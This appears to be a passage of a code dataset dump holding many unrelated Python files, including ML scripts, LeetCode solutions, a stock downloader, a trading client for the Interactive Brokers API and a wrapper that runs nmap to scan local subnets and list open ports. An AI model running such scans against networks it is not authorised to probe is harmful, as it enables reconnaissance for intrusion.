device='cuda')\n\nif __name__ == '__main__':\n #main()\n model = torch.load(\"./checkpoints/Kaggle_pretrained.pkl\")\n train_data = Task1_loader(\"./Task_1/train.csv\", phase='train')\n test_data = Task1_loader(\"./Task_2_3/test.csv\", phase='test')\n batch_size = 20\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=8)\n valid_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=8)\n\n\n criterion = nn.BCELoss()\n # optimizer = optim.SGD(model.parameters(), lr=0.0018, momentum=0.27)\n optimizer = optim.Adam(model.parameters(), lr=5e-5, weight_decay=1e-5)\n\n train(model, train_loader, valid_loader, criterion, optimizer, 100, device='cuda')\n","sub_path":"task3_main.py","file_name":"task3_main.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"544552368","text":"import unittest\nfrom src.data_structures.mockdata import MockData\n\n\nclass TestMockData (unittest.TestCase):\n\n def setUp(self):\n\n self.data = MockData()\n\n def test_random_data(self):\n data = MockData()\n a_set = data.get_random_elements(10)\n self.assertTrue(len(a_set) == 10, \"the data should have 10 elements!\")\n\n if __name__ == '__main__':\n unittest.main()","sub_path":"tests/data_stuctures/test_mockdata.py","file_name":"test_mockdata.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347059899","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\niris = load_iris()\n# print(type(iris))\n# print(iris.data)\n\nX = iris.data # feature matrix\ny = iris.target # response vector\n\nprint(X.shape)\n# print('X=>', X)\nprint(y.shape)\n# print('y=>', y)\n\nX_new = [[3, 5, 4, 2], [5, 4, 3, 2]] # test data\n\nknn = KNeighborsClassifier(n_neighbors=1)\n# print(knn)\nknn.fit(X, y)\nknn1_y_pred = knn.predict(X)\n# print(\"1 neighbor KNN prediction =>\", knn.predict(X_new))\n# checking the training accuracy\nprint(\"Prediction metric KNN1\", metrics.accuracy_score(y, knn1_y_pred))\n\n# TUNING the model with KNN 5\nknn = KNeighborsClassifier(n_neighbors=5)\nknn.fit(X, y)\nknn5_y_pred = knn.predict(X)\n# print(\"5 neighbor KNN prediction =>\", knn.predict(X_new))\n# checking the training accuracy\nprint(\"Prediction metric KNN5\", metrics.accuracy_score(y, knn5_y_pred))\n\n# Using Logistic regression model\nlogreg = LogisticRegression()\nlogreg.fit(X, y)\nlogreg_y_pred = logreg.predict(X)\n# checking the training accuracy\nprint(\"Prediction metric Logistic regression\", metrics.accuracy_score(y, logreg_y_pred))\n\n'''\n training and testing\n'''\n\n# step 1 : split raing and testing data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, )\n# step 2 : make prediction on testing set\n# logreg\nlogreg = LogisticRegression()\nlogreg.fit(X_train, y_train)\nlogreg_y_test_pred = logreg.predict(X_test)\nprint(\"Prediction metric Logistic regression\", metrics.accuracy_score(y_test, logreg_y_test_pred))\n\n# KNN 5\nknn = KNeighborsClassifier(n_neighbors=5)\nknn.fit(X_train, y_train)\nknn_y_test_pred = knn.predict(X_test)\nprint(\"Prediction metric KNN5\", metrics.accuracy_score(y_test, knn_y_test_pred))\n\n# KNN 1\nknn = KNeighborsClassifier(n_neighbors=1)\nknn.fit(X_train, y_train)\nknn_y_test_pred = knn.predict(X_test)\nprint(\"Prediction metric KNN1\", metrics.accuracy_score(y_test, knn_y_test_pred))\n\n# determining the best k value\nk_range = range(1, 91)\nscore = []\nfor k in k_range:\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train, y_train)\n knn_y_test_pred = knn.predict(X_test)\n # print(\"Prediction metric KNN1\", metrics.accuracy_score(y_test, knn_y_test_pred))\n score.append(metrics.accuracy_score(y_test, knn_y_test_pred))\n\nplt.plot(k_range, score)\nplt.xlabel('value of K for KNN')\nplt.ylabel('Testing accuracy')\nplt.show()\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"233431513","text":"import numpy as np\n\n\ndef is_valid_cell(cell, num_rows, num_cols):\n '''\n Determines whether a cell is within the bounds of the grid\n\n Parameters\n ----------\n cell : tuple\n row and column index\n num_rows: int\n num_cols: int\n \n Returns\n -------\n bool\n True if cell is within grid bounds\n\n '''\n i, j = cell\n if i >= 0 and i < num_rows and j >=0 and j < num_cols:\n return True\n else:\n return False\n\n# Could do something smarter in this function if you know the direction of the start position\ndef get_directions(type=\"diag\"):\n '''\n Returns all of the possible directions to travel in the grid, given a type of neighborhood\n\n Parameters\n ----------\n type: string\n Gives the type of neighborhood (diag,square)\n \n Returns\n -------\n list of tuples\n '''\n if type == \"diag\":\n return [(0,-1),(-1,-1),(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1)]\n elif type ==\"square\":\n return [(0,-1),(-1,0),(0,1),(1,0)]\n\n\ndef get_valid_neighbors(cur_cell, visited_grid, grid):\n\n \n '''\n Returns all the neighbors of a given cell that are valid cells, unvisited, and not an obstacle\n\n Parameters\n ----------\n cur_cell : tuple\n row and column index\n visited_grid: np.array\n Boolean grid with visited cells True\n grid: np.array\n Potential function grid\n \n Returns\n -------\n neighbors: list\n List of indices (tuples) of valid neighbors\n '''\n\n num_rows, num_cols = visited_grid.shape\n directions = get_directions()\n neighbors = []\n for dir in directions:\n nr = cur_cell[0] + dir[0]\n nc = cur_cell[1] + dir[1]\n if is_valid_cell((nr,nc),num_rows,num_cols) and not visited_grid[nr,nc] and grid[nr,nc]:\n neighbors.append((nr,nc))\n return neighbors\n \n\n\ndef potential_function(map, goal_cell):\n '''\n Computes the potential function for the grid starting at the goal state\n \n Parameters\n ----------\n grid: np.array\n Binary 2d matrix with obstacles as 0\n \n goal_cell: tuple\n Index of goal cell in grid\n \n Returns\n -------\n grid: np.array\n Potential function on the grid\n\n '''\n row,col = goal_cell\n p = 1\n grid = np.copy(map)\n visited_grid = np.zeros_like(grid,dtype=bool)\n # initialize goal potential to 1\n grid[row,col] = p\n visited_grid[row,col] = True\n cur_set = [goal_cell]\n while cur_set:\n p += 1\n next_set = []\n for cell in cur_set:\n cr, cc = cell\n neighbors = get_valid_neighbors(cell, visited_grid, grid)\n for neighbor in neighbors:\n nr,nc = neighbor\n grid[nr,nc] = p\n visited_grid[nr,nc] = True\n next_set.append(neighbor)\n \n cur_set = next_set\n \n return grid\n\n \n\n \ndef main():\n grid_map = np.array([[1,1,1,1,1,0],[1,1,0,1,1,0],[1,1,0,0,1,0],[1,1,1,1,1,0],[1,1,1,1,1,1]])\n \n original = potential_function(grid_map,(1,3))\n new_potential = potential_function(original,(3,2))\n print(new_potential)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"webots_project/mavic_Edit_python/controllers/mavic2proPython/modules/wavefront.py","file_name":"wavefront.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"188655280","text":"from flask import Flask, render_template, request, redirect, url_for\n\nclass Tarriff:\n def __init__(\n self,\n name,\n *,\n price = 0,\n price_period = 'month',\n gb = 0,\n minutes = 0,\n sms = 0,\n hit = False,\n gb_unlim = None,\n minutes_unlim_tele2 = True,\n archived = False\n ):\n self.name = name\n self.price = price\n self.price_period = price_period\n self.gb = gb\n self.minutes = minutes\n self.sms = sms\n self.hit = hit\n self.gb_unlim = gb_unlim\n self.minutes_unlim_tele2 = minutes_unlim_tele2\n self.archived = archived\n\nclass TarriffManager:\n def __init__(self):\n self.items = []\n\n def add(self,item):\n self.items.append(item)\n\n def actual(self):\n # фактически задача поиска:\n # archived == False\n return list(filter(lambda tariff: not tariff.archived, self.items))\n\n def archived(self):\n return list(filter(lambda tarriff: tarriff.archived == True, self.items))\n\n\n\n\n\n\n\n\n","sub_path":"app/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161947718","text":"from django import template\n\nfrom zuma.apps.servicios.models import Servicios, Categoria \n\nregister = template.Library()\n\n@register.inclusion_tag('servicios_index.html', takes_context=True)\ndef show_servicios(context):\n\tcategoria = Categoria.objects.get(nombre='desarrollo')\n\tservicios = Servicios.objects.filter(categoria_general=categoria).order_by('id')[:3]\n\n\treturn{ 'MEDIA_URL':context['MEDIA_URL'], 'servicios':servicios }","sub_path":"zuma/apps/servicios/templatetags/servicios_tags.py","file_name":"servicios_tags.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160783137","text":"# LC235 Lowest Common Ancestor of a Binary Tree\n# Medium\n\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.\n# According to the definition of LCA on Wikipedia: \"The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself).\"\n\n\n# Note:\n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n\n\nfrom A02_TreeNode import *\n\n\nclass Solution(object):\n\n # Version A, use the bianry heap method by showPerfectNodeLayers\n # This will not pass the max time limit\n def showPerfectNodeLayers(self, root):\n \"\"\"\n Generate a perfect binary heap in list of nodes (Not Values)\n use None to replace empty Nodes for take index places\n \"\"\"\n if not root:\n return []\n result = [root]\n layer = [root]\n while any(layer):\n new_layer = []\n for i in layer:\n if not i:\n new_layer.append(None)\n new_layer.append(None)\n else:\n new_layer.append(i.left if i.left else None)\n new_layer.append(i.right if i.right else None)\n result += new_layer\n layer = new_layer\n\n # add the first one to be None, to move the index starting from 1\n result = [None] + result\n return result\n\n def lowestCommonAncestor(self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\") -> \"TreeNode\":\n binaryheap = self.showPerfectNodeLayers(root)\n\n i, pi, qi = 0, 0, 0\n while i != len(binaryheap):\n node = binaryheap[i]\n if node is p:\n pi = i\n if node is q:\n qi = i\n i += 1\n\n parent_p, parent_q = [], []\n while pi != 0:\n parent_p.append(pi)\n pi = pi // 2\n while qi != 0:\n parent_q.append(qi)\n qi = qi // 2\n\n while parent_p and parent_q:\n A, B = parent_p.pop(), parent_q.pop()\n if A == B:\n lca = A\n else:\n break\n\n return binaryheap[lca]\n\n\nclass Solution(object):\n # STD ans\n # Time: O(n)\n # Space: O(h)\n def lowestCommonAncestor(self, root: \"TreeNode\", p: \"TreeNode\", q: \"TreeNode\") -> \"TreeNode\":\n if root in (None, p, q):\n return root\n\n left = self.lowestCommonAncestor(root.left, p, q)\n right = self.lowestCommonAncestor(root.right, p, q)\n\n # 1. If the current subtree contains both p and q,\n # return their LCA.\n # 2. If only one of them is in that subtree,\n # return that one of them.\n # 3. If neither of them is in that subtree,\n # return the node of that subtree.\n\n # return root if left and right else left or right\n # 等同于扩展成\n if left and right:\n return root\n if left:\n return left\n if right:\n return right\n # 精妙解释:\n # 如果一个节点的两侧,分别包含了一个p和一个q,那么这个节点就是最低了\n # 否则的话, 就会出现一侧为空, 另一个包含两个, 这样就可以往包含两个的那一侧递归\n\n\nif __name__ == \"__main__\":\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left, A.right) == A, \"Example 1\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left, A.left.right.right) == A.left, \"Example 2\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left.left, A.left.right.right) == A.left, \"Additional 1\"\n\n A = genTree([\n 3,\n 5, 1,\n 6, 2, 0, 8,\n None, None, 7, 4,\n ])\n assert Solution().lowestCommonAncestor(A, A.left.right, A.right.left) == A, \"Additional 2\"\n\n A = genTree([\n 2,\n None, 3\n ])\n assert Solution().lowestCommonAncestor(A, A, A.right) == A, \"Additional 3\"\n\n A = genTree([\n 2,\n 1, None\n ])\n assert Solution().lowestCommonAncestor(A, A, A.left) == A, \"Additional 4\"\n\n print(\"All passed\")\n","sub_path":"LeetCode/LC236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"LC236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212331949","text":"from __future__ import absolute_import, division, print_function, unicode_literals\ntry:\n from urllib import urlretrieve, urlopen\nexcept ImportError:\n from urllib.request import urlretrieve, urlopen\nimport numpy as np\nimport pandas as pd\nfrom pandas.tseries.offsets import BDay\nimport os\nimport datetime as dt\nimport logging\n\ndef download(ticker, file_name,logger):\n url = 'http://www.google.com/finance/historical?startdate=%s&enddate=%s&output=csv&q=%s'%('Jan 03, 2000','Dec 31, 2016',ticker.lower())\n status = urlopen(url).getcode()\n if status == 200:\n logger.info('Downloading %s data to file: %s'%(ticker, file_name))\n urlretrieve(url, file_name)\n return True\n else:\n logger.info('File not found. Please check settings!')\n return False\n\ndef data_available(m,logger):\n dir_name = '../historicalData/'\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n file_name = '%s%s.csv'%(dir_name, m.lower())\n if os.path.exists(file_name):\n print('%s exists'%file_name)\n return True\n else:\n try:\n assert(download(m, file_name,logger))\n return True\n except AssertionError:\n logger.exception(\"%s not found. Ommitting!\"%file_name)\n return False \n\ndef download_security_list(exchange, logger):\n\n file_name = '../%s.txt'%exchange.lower()\n if not os.path.exists(file_name):\n url = 'https://raw.githubusercontent.com/Auquan/auquan-historical-data/master/%s'%(file_name)\n status = urlopen(url).getcode()\n if status == 200:\n logger.info('Downloading data to file: %s'%file_name)\n urlretrieve(url, file_name)\n return True\n else:\n logger.info('File not found. Please check exchange settings!')\n return False\n else:\n return True\n\ndef get_logger():\n logger_name = dt.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n logger_dir = 'runLogs/'\n logger_file = '%srun-%s.txt'%(logger_dir,logger_name)\n if not os.path.exists(logger_dir):\n os.makedirs(logger_dir)\n formatter = logging.Formatter('%(message)s')\n file_handler = logging.FileHandler(logger_file)\n console_handler = logging.StreamHandler()\n file_handler.setFormatter(formatter)\n console_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n return logger\n\n\nlogger = get_logger()\nmarkets = []\nexchange='all'\n#Download list of securities\nassert(download_security_list(exchange, logger))\nif len(markets)==0:\n file_name = '../%s.txt'% exchange.lower()\n markets = [line.strip() for line in open(file_name)]\n\nprint(markets)\nmarket_to_drop = []\nfor market in markets:\n print('checking %s'%market)\n is_avail = data_available( market, logger)\n print(' %s available'%market)\n if not is_avail:\n markets.remove(market)\n\nfile_name = '../stocks.txt'\nf = open(file_name,'w')\nfor m in markets:\n print(m)\n f.write('%s'%m)\n f.write('\\n')\n\nprint('Done')\n\n\n\n","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283022602","text":"import jieba\r\nimport pandas as pd\r\nimport numpy as np\r\nimport math\r\n\r\ndef std(list):\r\n std = 0\r\n for item in list:\r\n std += item**2\r\n return math.sqrt(std/len(list))\r\n\r\ndef average(list):\r\n return sum(list)/len(list)\r\n\r\ndef getsplitreview(location):\r\n bookreview = pd.read_csv(location)\r\n splitbookreviewdetail = []\r\n splitbookreview = []\r\n for reviewpassage in bookreview['review']:\r\n temp1 = list(jieba.cut(reviewpassage, cut_all=False))\r\n splitbookreview.extend(temp1)\r\n splitbookreviewdetail.append(temp1)\r\n rating = list(bookreview['rating'])\r\n return splitbookreview, splitbookreviewdetail, rating\r\n\r\ndef createVocabList(dataSet, percent):\r\n vocabSet = set([])\r\n numbercount = {}\r\n for word in dataSet:\r\n vocabSet = vocabSet | set(word)\r\n if word not in numbercount.keys():\r\n numbercount[word] = 1\r\n if word in numbercount.keys():\r\n numbercount[word] += 1\r\n sortednumbercount = list(sorted(numbercount.items(), key= lambda d:d[1],reverse = True))\r\n finaldataset = sortednumbercount[len(sortednumbercount)//percent:-len(sortednumbercount)//percent]\r\n finalfinaldataset = list(np.array(finaldataset).transpose()[0])\r\n return finalfinaldataset\r\n\r\ndef bagOfWords2Vec(vocabList, inputSet):\r\n returnVec = [0] * len(vocabList)\r\n for word in inputSet:\r\n if word in vocabList:\r\n returnVec[vocabList.index(word)] += 1\r\n return returnVec","sub_path":"bookreviewfunctions.py","file_name":"bookreviewfunctions.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"420628776","text":"class Line:\n def __init__(self, coor1,coor2):\n self.coor1 = coor1\n self.coor2 = coor2\n\n def distance(self):\n x1,y1 = self.coor1\n x2,y2 = self.coor2\n return ((x2-x1)**2 +(y2-y1)**2)**.5\n\nc1 = (3,2)\nc2 = (8,10)\nl = Line(c1,c2)\nprint(l.distance())\n","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326809904","text":"import pygame, sys\nfrom settings import (\n DISPLAYSURF,\n colors, grid_x, grid_y,\n nr_of_rows, nr_of_collumns,\n grid_start_x, grid_start_y\n)\n\n\nclass Node:\n def __init__(self, x=None, y=None, name=None, prev_node=None):\n self.name = name\n self.prev_node = prev_node\n self.distance = 1000000000\n self.x = x\n self.y = y\n self.address = [x,y]\n self.wx= grid_x-1\n self.wy=grid_y-1\n self.color = colors['cream']\n\n def adjacent_addresses(self):\n vectors = (\n [-1*grid_x,0],\n [grid_x,0],\n [0,grid_y],\n [0,-1*grid_y],\n )\n return [ [self.x+v[0], self.y+v[1]] for v in vectors ]\n\n def click_check(self, mouse):\n if (\n (self.x <= mouse[0] and self.x + self.wx >= mouse[0])\n and\n (self.y <= mouse[1] and self.y + self.wy >= mouse[1])\n ):\n return True\n\n def draw(self):\n pygame.draw.rect(\n DISPLAYSURF,\n self.color,\n (self.x, self.y, self.wx, self.wy)\n )\n\n# Create Matrix of Nodes\ndef create_grid(nr_of_rows, nr_of_collumns):\n node_list = []\n for row in range(nr_of_rows):\n for collumn in range(nr_of_collumns):\n node_list.append(\n Node(\n name='{}-{}'.format(collumn, row),\n x=collumn*grid_x+grid_start_y,\n y=row*grid_x+grid_start_x,\n )\n )\n return node_list\n\nnode_list = create_grid(\n nr_of_rows,\n nr_of_collumns,\n)\n","sub_path":"src/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357532348","text":"#!/usr/bin/env python\n# coding: utf-8\n\n'''\nAuthor: Bogomolov I\ne-mail: i32311113@icloud.com\nClass that represent Nmap interface that:\n-raise only ScanerError with description\n-and have next 6 methods:\n--init(): get nmap and try execute it\n--__check_network(): check string like 192.168.2.5/30\n--__get_ip_address(): get address from specified iface\n--scan_connected(): run nmap and scan connected /24 network\n--scan_custom(): run nmap and scan specified network\n--parse_result(): decode nmap output and create dict from it\n'''\n\nfrom __future__ import print_function\nimport re, socket, fcntl, struct\nfrom subprocess import check_output\nfrom subprocess import Popen, PIPE\n\nclass ScanerError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return '{0}: {1}'.format('NetworkScaner.py', self.message)\n\nclass Scaner(object):\n\n def __init__(self, nmap_path='nmap'):\n '''\n nmap_path - may use not system nmap, like '/opt/***/nmap'\n Check if nmap exist/executed\n and get local addresses from interfaces\n '''\n command_for_test = [nmap_path + ' -V']\n version_pattern = re.compile(r'version\\s(\\S+)\\s')\n test_result = check_output(command_for_test, shell=True)\n if version_pattern.search(test_result):\n self.nmap_version = version_pattern.search(test_result).group(1)\n else:\n raise ScanerError('Nmap not executed!')\n self.command_default = [nmap_path]\n self.raw_result = ''\n self.result = {}\n\n def __check_network(self, network):\n '''\n Check if network correct\n '''\n flag = False\n try:\n tmp = network.split('/')[0].split('.') + network.split('/')[-1:]\n except:\n flag = True\n if len(tmp) != 5:\n flag = True\n for i in tmp[:-1]:\n try:\n if int(i) > 255 or int(i) < 0:\n flag = True\n except:\n flag = True\n try:\n if int(tmp[-1]) > 32 or int(tmp[-1]) < 0:\n flag = True\n except:\n flag = True\n return flag\n\n def __get_ip_address(self, ifname):\n '''\n Return ip address from iface\n '''\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n\n def scan_connected(self, iface):\n '''\n Scan connected network from interface\n only with /24 mask\n '''\n try:\n network = self.__get_ip_address(iface)\n network = '.'.join(network.split('.')[:-1] + ['0']) + '/24'\n except:\n raise ScanerError(\\\n 'Can\\'t get address from interface ' + repr(iface))\n if self.__check_network(network): #\n raise ScanerError(\\\n 'Incorrect network address ' + repr(network))\n proc = Popen(self.command_default + [network], stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n self.raw_result += '\\n\\n' + out + '\\n\\n' + err\n\n def scan_custom(self, network):\n '''\n Scan only specified net\n '''\n if self.__check_network(network):\n raise ScanerError(\\\n 'Incorrect network address ' + repr(network))\n proc = Popen(self.command_default + [network], stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n self.raw_result += '\\n\\n' + out + '\\n\\n' + err\n\n def parse_result(self):\n '''\n Return dict with nmap scan result, like:\n {'192.168.3.13': [], '192.168.3.6': ['443/tcp', '902/tcp', '912/tcp', '5357/tcp']}\n '''\n if self.raw_result == '':\n raise ScanerError('Call scan*-methods first.')\n ip_pattern = re.compile(r'Nmap\\sscan\\sreport\\sfor\\s(\\S+)')\n port_pattern = re.compile(r'(\\S+)/(\\w+)\\s.+')\n ip_0 = ''\n ports = []\n for st in self.raw_result.split('\\n'):\n if ip_pattern.search(st):\n self.result[ip_0] = ports\n ports = []\n ip_0 = ip_pattern.search(st).group(1)\n if port_pattern.search(st):\n ports.append(port_pattern.search(st).group(1) \\\n + '/' + port_pattern.search(st).group(2))\n self.result[ip_0] = ports\n del self.result['']\n return self.result\n\nif __name__ == '__main__':\n\n # Self testing\n\n s = Scaner('/usr/bin/nmap')\n #s.scan_custom('254.254.16.12/32'); print('Frist done!')\n #s.scan_custom('254.254.16.12/35'); print('Second done!')\n s.scan_connected('eth0')\n print(s.parse_result())\n exit(0)","sub_path":"collectors/CollectorOS/NetworkScaner.py","file_name":"NetworkScaner.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443522573","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n#\r\n# 局部加权线性回归\r\n# 牛顿法\r\n#\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef load_data():\r\n \"\"\" 加载数据 \"\"\"\r\n dataset = []\r\n f = open('a.txt', 'r')\r\n for line in f.readlines():\r\n x = line.strip().split()\r\n dataset.append([float(x[0]), float(x[1]), float(x[2])])\r\n f.close()\r\n return dataset\r\n\r\n\r\nclass LWR(object):\r\n \"\"\"\r\n 局部加权线性回归\r\n 随机梯度\r\n \"\"\"\r\n def __init__(self, x_train, tau=0.04): # 0.04合适\r\n self.x = np.array(x_train)\r\n self.m, self.n = self.x.shape\r\n self.tau = tau\r\n\r\n def predict(self, x, alpha=0.01, max_it=500):\r\n np.random.seed(seed=int(time.time()))\r\n theta = np.zeros(self.n - 1)\r\n w = np.exp(-(x - self.x[:, 1])**2 / (2*self.tau**2))\r\n a = range(self.m)\r\n for itr in range(max_it):\r\n rs = np.random.choice(a, self.m, replace=False) # 构造随机访问序列\r\n for i in rs:\r\n error = self.x[i, 2] - np.sum(self.x[i, 0:2] * theta)\r\n if np.abs(error) < 1e-6:\r\n #print '---', itr\r\n return x * theta[1] + theta[0]\r\n theta += w[i]*self.x[i, 0:2] * alpha * error\r\n return x * theta[1] + theta[0]\r\n\r\n\r\nif __name__ == '__main__':\r\n np.set_printoptions(suppress=True) # 显示10进制\r\n x = load_data()\r\n lwr = LWR(x[0:100])\r\n plt.scatter(lwr.x[:, 1], lwr.x[:, 2], color='b', s=10)\r\n x1 = np.linspace(0, np.max(lwr.x[:, 1]), 100)\r\n z = [lwr.predict(x) for x in x1]\r\n plt.scatter(x1, z, color='r', s=11)\r\n plt.show()","sub_path":"ML/回归/lwlr.py","file_name":"lwlr.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213182236","text":"# Installing (source activate ENVIRONMENT):\n# Cd to: cd ~/Desktop/Darwinex/darwinex-ibkr/TWS_API/twsapi_macunix.976.01/IBJts/source/pythonclient/\n# Do: python3 setup.py bdist_wheel\n# Do: python3 -m pip install --user --upgrade dist/ibapi-9.76.1-py3-none-any.whl\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract, ContractDetails\nfrom ibapi.order import Order\nfrom ibapi.order_state import OrderState\nfrom ibapi.execution import Execution, ExecutionFilter\nfrom ibapi.commission_report import CommissionReport\n\nimport threading, logging, time\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s.%(msecs)03d %(levelname)s <> %(funcName)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n#######################################\n\nclass AlphaApp(EWrapper, EClient):\n\n def __init__(self):\n\n self.logger = logging.getLogger(__name__)\n EClient.__init__(self, wrapper=self)\n\n ###########################################################\n\n def error(self, reqId: int, errorCode: int, errorString: str):\n\n '''This event is called when there is an error with the\n communication or when TWS wants to send a message to the client.'''\n\n self.logger.error(f'reqId: {reqId} / Code: {errorCode} / Error String: {errorString}')\n\n def contractDetails(self, reqId: int, contractDetails: ContractDetails):\n\n '''Receives the full contract's definitions. This method will return all\n contracts matching the requested via EEClientSocket::reqContractDetails.'''\n\n self.logger.info(f'contractDetails: {contractDetails}')\n\n def openOrder(self, orderId: int, \n contract: Contract, \n order: Order,\n orderState: OrderState):\n\n '''This function is called to feed in open orders.'''\n\n self.logger.info(f'orderId: {orderId} / contract: {contract} / order: {order} / orderState: {orderState}')\n\n def orderStatus(self, orderId: int, \n status: str, \n filled: float,\n remaining: float, \n avgFillPrice: float, \n permId: int,\n parentId: int, \n lastFillPrice: float, \n clientId: int,\n whyHeld: str, \n mktCapPrice: float):\n\n '''This event is called whenever the status of an order changes. It is\n also fired after reconnecting to TWS if the client has any open orders.'''\n\n self.logger.info(f'orderId: {orderId} / status: {status} / filled: {filled} / remaining: {remaining} / avgFillPrice: {avgFillPrice} / clientId: {clientId}')\n\n def execDetails(self, reqId: int, \n contract: Contract, \n execution: Execution):\n\n '''This event is fired when the reqExecutions() functions is\n invoked, or when an order is filled.'''\n\n self.logger.info(f'contract: {contract} / execution: {execution}')\n\n def commissionReport(self, commissionReport: CommissionReport):\n\n '''The commissionReport() callback is triggered as follows:\n\n - Immediately after a trade execution.\n - By calling reqExecutions().'''\n\n self.logger.info(f'commissionReport: {commissionReport}')\n\n ###########################################################\n\n def nextValidId(self, orderId: int):\n\n '''Receives next valid order id from TWS.'''\n\n self._nextValidOrderId = orderId\n\n self.logger.info(f'¡Connected!')\n self.logger.info(f'NextValidOrderId: {orderId}')\n \n a = threading.active_count()\n self.logger.info(f'Thread count for reference: {a}')\n\n # Call client method:\n self.reqCurrentTime()\n\n # Request contract data:\n nvidiaStock = self.createUSStockContract('NVDA', primaryExchange='NASDAQ')\n\n # Create orders and place:\n #mktOrder = self.createMarketOrder('BUY', totalQuantity=100)\n #self.placeOrder(self.getNextValidId(), nvidiaStock, mktOrder)\n\n #time.sleep(5)\n\n # Get commission report > Request executions and get the result back:\n execFilter = ExecutionFilter()\n execFilter.acctCode = 'DU2727647'\n execFilter.symbol = 'NVDA'\n self.reqExecutions(self.getNextValidId(), execFilter=execFilter)\n\n def getNextValidId(self) -> int:\n\n '''Get new request ID by incrementing previous one.'''\n\n newId = self._nextValidOrderId\n self._nextValidOrderId += 1\n self.logger.info(f'NextValidOrderId: {newId}')\n return newId\n\n ###########################################################\n\n def createUSStockContract(self, symbol: str, primaryExchange: str):\n\n '''Create a US Stock contract placeholder.'''\n\n contract = Contract()\n contract.symbol = symbol\n contract.secType = 'STK'\n contract.exchange = 'SMART'\n contract.currency = 'USD'\n contract.primaryExchange = primaryExchange\n self.logger.info(f'Contract: {contract}')\n\n return contract\n\n def createMarketOrder(self, action: str, totalQuantity: int):\n\n '''Create a market order.'''\n\n order = Order()\n order.action = action\n order.orderType = 'MKT'\n order.totalQuantity = totalQuantity\n self.logger.info(f'Order: {order}')\n\n return order\n\n def createStopOrder(self, action: str, totalQuantity: int, stopPrice: float):\n\n '''Create a market order.'''\n\n order = Order()\n order.action = action\n order.orderType = 'STP'\n order.totalQuantity = totalQuantity\n order.auxPrice = stopPrice\n self.logger.info(f'Order: {order}')\n\n return order\n\nif __name__ == \"__main__\":\n\n app = AlphaApp()\n 